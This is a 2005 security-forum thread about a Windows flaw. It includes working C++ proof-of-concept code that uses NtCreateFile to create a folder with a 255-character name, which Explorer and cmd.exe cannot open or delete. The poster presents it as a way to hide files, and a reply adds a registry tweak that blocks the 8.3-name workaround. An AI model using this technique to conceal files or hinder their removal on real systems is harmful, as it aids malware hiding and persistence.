[tibbar]

Here's a little flaw in Windows I recently discovered. Any folder name of 255 char's long, cannot be opened by cmd.exe or explorer.exe, despite the name being valid within ntfs.

You can use the native api (Ntxxx) to create such folder. Below is a POC which creates a folder named "___________________________" x 255 and creates an empty file inside the folder.

Neither cmd.exe nor explorer.exe can access the folder or delete it! Potentially unwelcome guests could use this flaw to hide their files.

Here's the code, and a compiled version is posted in downloads since compiling requires the DDK.

#define UNICODE
#include "windows.h"
#include <iostream>

#pragma comment(lib,"C:\\WINDDK\\DDK_WI~1\\lib\\wxp\\i386\\ntdll.lib")
#pragma comment(lib,"C:\\WINDDK\\DDK_WI~1\\lib\\wxp\\i386\\ntoskrnl.lib")

typedef LONG NTSTATUS;
typedef struct _UNICODE_STRING {
    USHORT Length;
    USHORT MaximumLength;
#ifdef MIDL_PASS
    [size_is(MaximumLength / 2), length_is((Length) / 2) ] USHORT * Buffer;
#else // MIDL_PASS
    PWSTR  Buffer;
#endif // MIDL_PASS
} UNICODE_STRING;
typedef UNICODE_STRING *PUNICODE_STRING;

typedef struct _OBJECT_ATTRIBUTES {
    ULONG Length;
    HANDLE RootDirectory;
    PUNICODE_STRING ObjectName;
    ULONG Attributes;
    PVOID SecurityDescriptor;        // Points to type SECURITY_DESCRIPTOR
    PVOID SecurityQualityOfService;  // Points to type SECURITY_QUALITY_OF_SERVICE
} OBJECT_ATTRIBUTES;
typedef OBJECT_ATTRIBUTES *POBJECT_ATTRIBUTES;

typedef struct _IO_STATUS_BLOCK {
    union {
        NTSTATUS Status;
        PVOID Pointer;
    };

    ULONG_PTR Information;
} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;

extern "C" NTSTATUS __stdcall 
NtCreateFile(
    OUT PHANDLE FileHandle,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_ATTRIBUTES ObjectAttributes,
    OUT PIO_STATUS_BLOCK IoStatusBlock,
    IN PLARGE_INTEGER AllocationSize OPTIONAL,
    IN ULONG FileAttributes,
    IN ULONG ShareAccess,
    IN ULONG CreateDisposition,
    IN ULONG CreateOptions,
    IN PVOID EaBuffer OPTIONAL,
    IN ULONG EaLength
    );

extern "C" void __stdcall
  RtlInitUnicodeString(
    IN OUT PUNICODE_STRING  DestinationString,
    IN PCWSTR  SourceString
    );
extern "C" void __stdcall
RtlFreeUnicodeString(
    IN PUNICODE_STRING  UnicodeString
    );

extern "C" NTSTATUS __stdcall
  NtClose(
    IN HANDLE  Handle
    );

#define InitializeObjectAttributes( p, n, a, r, s ) { \
    (p)->Length = sizeof( OBJECT_ATTRIBUTES );          \
    (p)->RootDirectory = r;                             \
    (p)->Attributes = a;                                \
    (p)->ObjectName = n;                                \
    (p)->SecurityDescriptor = s;                        \
    (p)->SecurityQualityOfService = NULL;               \
    }

#define OBJ_CASE_INSENSITIVE    0x00000040L
#define FILE_NON_DIRECTORY_FILE                 0x00000040
#define FILE_ATTRIBUTE_VALID_FLAGS          0x00007fb7
#define OBJ_KERNEL_HANDLE       0x00000200L
#define FILE_SUPERSEDE                  0x00000000
#define FILE_DIRECTORY_FILE                     0x00000001
#define FILE_CREATE                     0x00000002

void CreateUnicode(PUNICODE_STRING pString, wchar_t* pText)
{
	RtlInitUnicodeString(pString, pText);
	
	return;
}

int main(int argc, char* argv[])
{
	if(strcmp(argv[0], "create") && argc == 3)
	{
  // get current folder
  char temp;
  DWORD requiredLength = GetCurrentDirectoryA(1, &temp);
  char* buffer = new char[requiredLength];
  DWORD didItWork = GetCurrentDirectoryA(requiredLength, buffer);
  strupr(buffer);

  // make a folder inside current location
  std::string strTempDir;
  strTempDir.insert(0,"\\___________________________________________________________________________
________________________________________________________________________________
_
________________________________________________________________________________
_
________________\\");
  strTempDir.insert(0,buffer);
  strTempDir.insert(0,"\\DosDevices\\");
  const char* strbufferDir = strTempDir.c_str();

  size_t lenDir = strlen(strbufferDir)+1;
  wchar_t* wideStringDir = new wchar_t[lenDir];
  size_t numConvertedDir = mbstowcs(wideStringDir, strbufferDir, lenDir);


  std::string strTempFile = std::string(argv[2]);
  strTempFile.insert(0,"\\___________________________________________________________________________
________________________________________________________________________________
_
________________________________________________________________________________
_
________________\\");
  strTempFile.insert(0,buffer);
  strTempFile.insert(0,"\\DosDevices\\");
  const char* strbufferFile = strTempFile.c_str();

  size_t lenFile = strlen(strbufferFile)+1;
  wchar_t* wideStringFile = new wchar_t[lenFile];
  size_t numConvertedFile = mbstowcs(wideStringFile, strbufferFile, lenFile);


  UNICODE_STRING dirUniStr;
  RtlInitUnicodeString(&dirUniStr, wideStringDir);

  UNICODE_STRING fileUniStr;
  RtlInitUnicodeString(&fileUniStr, wideStringFile);

  OBJECT_ATTRIBUTES ObjectAttributesDir;
  IO_STATUS_BLOCK IoStatusBlockDir;
  NTSTATUS StatusDir;

  OBJECT_ATTRIBUTES ObjectAttributesFile;
  IO_STATUS_BLOCK IoStatusBlockFile;
  NTSTATUS StatusFile;

  InitializeObjectAttributes(&ObjectAttributesDir,
        &dirUniStr,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
        NULL,
        NULL );

  InitializeObjectAttributes(&ObjectAttributesFile,
        &fileUniStr,
        OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
        NULL,
        NULL );

  HANDLE hDir;
  HANDLE hFile;

  StatusDir = NtCreateFile(&hDir,
     	 DELETE,
     	 &ObjectAttributesDir,
     	 &IoStatusBlockDir,
     	 NULL,
     	 FILE_ATTRIBUTE_NORMAL,
     	 FILE_SHARE_READ,
     	 FILE_CREATE,
     	 FILE_DIRECTORY_FILE,
     	 NULL, 
     	 0);

  StatusFile = NtCreateFile(&hFile,
     	 DELETE,
     	 &ObjectAttributesFile,
     	 &IoStatusBlockFile,
     	 NULL,
     	 FILE_ATTRIBUTE_NORMAL,
     	 FILE_SHARE_READ,
     	 FILE_SUPERSEDE,// for directories->FILE_CREATE, // for files-> FILE_SUPERSEDE,
     	 FILE_NON_DIRECTORY_FILE,//FILE_DIRECTORY_FILE,//FILE_NON_DIRECTORY_FILE,
     	 NULL, 
     	 0);

  NtClose(hFile);
  NtClose(hDir);

  delete wideStringDir, wideStringFile;

  printf("long file created...");
	}
	else
	{
  printf("Usage createLongFile.exe create filename\n");
  printf("This will create a long directory named ___... in current folder\n");
  printf("With a file inside it called \"filename\"\n");
  printf("This folder will be inaccessible from both explorer and cmd.exe\n");
  printf("POC by tibbar@governmentsecurity.org");
	}

	return 0;
}

[nolimit]

thanx!
oh, how do you compile?

[tibbar]

under visual studio it should compile. you need to first get hold of ntdll.lib and ntoskrnl.lib from the ddk.

[belgther]

Quote

Neither cmd.exe nor explorer.exe can access the folder or delete it! Potentially unwelcome guests could use this flaw to hide their files.

Then how will the unwelcome guests reach the files? via a shell? Because apis used in explorer.exe and cmd.exe can't get it...

[stay]

it's possible to access the folders with cmd.exe using a really simple trick...
however the fact that the dirs are still listed in explorer makes this bug somehow useless, because you could write a tool for checking those dirs and then access them by cmd.exe, so they finally offer no real "protection"/you won't be able to store files unreachable/hard to find in it.

[tibbar]

well, the trick to deleting them that stay found was to use the short file name for the folder.

however, adding the following reg value eliminates that possibility:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\FileSystem]
"NtfsDisable8dot3NameCreation"=dword:00000001

Also when the long name folder is placed not at the root (i.e. not at c:\ but at say c:\windows) then all normal context menu options are lost and the folder cannot be accessed or deleted or renamed.

It would be fairly easy to mod a ftp server to access these special folders, using native NtXXX functions.

[Killaloop]

http://support.micro...kb;en-us;205345
there microsoft says it has been fixed, guess they lost this fix after a few more patches.
as usual.

[stay]

hmm microsoft seems to have a very bad organisation ;)

addition to tibbar's solution post:
when 8.3 is disabled, you can still access the folders by using
/[full dir name]
as path, except when the path only exists of spaces (at least i found no way to get around this by using "..." - maybe someone knows a workaround for this/another method except this and the one (8.3) mentioned above?)

[kingvandal]

Quote

Also when the long name folder is placed not at the root (i.e. not at c:\ but at say c:\windows) then all normal context menu options are lost and the folder cannot be accessed or deleted or renamed.

you ain't kindin. I created it on the dektop and now the folder is stuck there..lol I tryed everything I could to get rid of it. Guess it's there to stay til I get a PBE cd going.


kv-

[tibbar]

services for unix can see it and delete it.

[stay]

kingvandal, on Jul 5 2005, 12:30 AM, said:

you ain't kindin.  I created it on the dektop and now the folder is stuck there..lol  I tryed everything I could  to get rid of it.  Guess it's there to stay til I get a PBE cd going. 


kv-

<{POST_SNAPBACK}>

use the commandline together with 8.3 names to get rid of it!